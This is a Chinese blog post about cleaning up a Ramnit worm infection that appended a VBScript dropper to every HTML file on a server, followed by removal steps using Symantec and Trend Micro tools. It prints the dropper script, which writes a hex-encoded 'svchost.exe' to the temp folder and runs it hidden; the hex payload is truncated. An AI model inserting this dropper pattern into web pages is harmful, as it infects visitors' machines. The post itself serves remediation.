• HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法


    参考:

    https://www.cnblogs.com/wuhairui/p/8297614.html
    http://www.guopingblog.com/post/100.html

    最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样

    1. <SCRIPT  Language=VBScript>  

    2.   

    3. DropFileName = “svchost.exe”  

    4.   

    5. WriteData =  

    6.   

    7. “4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”  

    8.   

    9. Set FSO = CreateObject("Scripting.FileSystemObject")  

    10. DropPath = FSO.GetSpecialFolder(2) & "" & DropFileName 

    11. If FSO.FileExists(DropPath)=False Then 

    12. Set FileObj = FSO.CreateTextFile(DropPath, True) 

    13. For i = 1 To Len(WriteData) Step 2 

    14. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) 

    15. Next 

    16. FileObj.Close 

    17. End If 

    18. Set WSHshell = CreateObject("WScript.Shell")  

    19. WSHshell.Run DropPath, 0  

    20. //--></SCRIPT>  

    到vps一看才发现 所有的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而导致流量飙升,百度了一晚上没搞明白,第二天又搞了一天试过360杀毒根本没啥用,最后用赛门铁克的  Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案

    1、下载    赛门铁克的  Ramnit 蠕虫病毒 专杀工具

    下载地址:https://www.symantec.com/security_response/writeup.jsp?docid=2015-022415-4725-99

    下载后直接运行 点 star 即可 全盘删完后会提示重启 点 yes 重启即可。

    2、用专杀工具杀完以后随机检查了几个 html 文件发现还有那段代码,不过不会像之前自己手动删了 然后里面就又被自动加上了,这说明病毒已经被杀掉了可能是文件太多,专杀工具没有全都检测得到,不过没关系可以用批量查找替换工具 ultrareplace 把网站重新查找替换一下即可。

    ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html

    目前看上去是问题解决了,还需再观察几天,尽量不要在服务器下载运行来历不明的软件,及时打补丁安装防护工具。


    首先表示强烈谴责,没事写出这种木马来。导致开发者把时间花在解决这种问题上。

    这种木马会在你全盘的html文件的最底部生成一堆vbscript代码,导致html文件变得很大。大概213kb。可以看出他就是在恶搞。

    如图:

    你写好的html,过段时间就变成这样了。前端开发表示简直心态爆炸。

    解决方案:

    1.至以下链接处下载ATTK扫描工具:

    http://support.trendmicro.com.cn ... stomizedpackage.exe (32位)

    http://support.trendmicro.com.cn ... mizedpackage_64.exe(64位)

    2.将下载的工具(supportcustomizedpackage)放到有问题的电脑上,双击运行
    3.在打开的界面中手动设定扫描全盘文件

    运行:

    全盘扫描:

    转:https://bbs.kafan.cn/thread-1830286-1-1.html

  • 相关阅读:
    VS2008中应用.NET 4.0中的代码契约
    生日快乐
    Did you know…How to maintain scrollposition after post back? z
    微软正式发布SQL Server 2008
    想要注册一个写日记用的博客(选好了)
    SCOPE_IDENTITY、IDENT_CURRENT 和 @@IDENTITY的区别(比较) z
    Microsoft Visual Studio 2010 and the .NET Framework 4.0 CTP下载
    mysql
    如何用iframe代码显示调用网页的指定部分
    文件夹权限
  • 原文地址:https://www.cnblogs.com/wangyuman26/p/10868966.html
Copyright © 2020-2023  润新知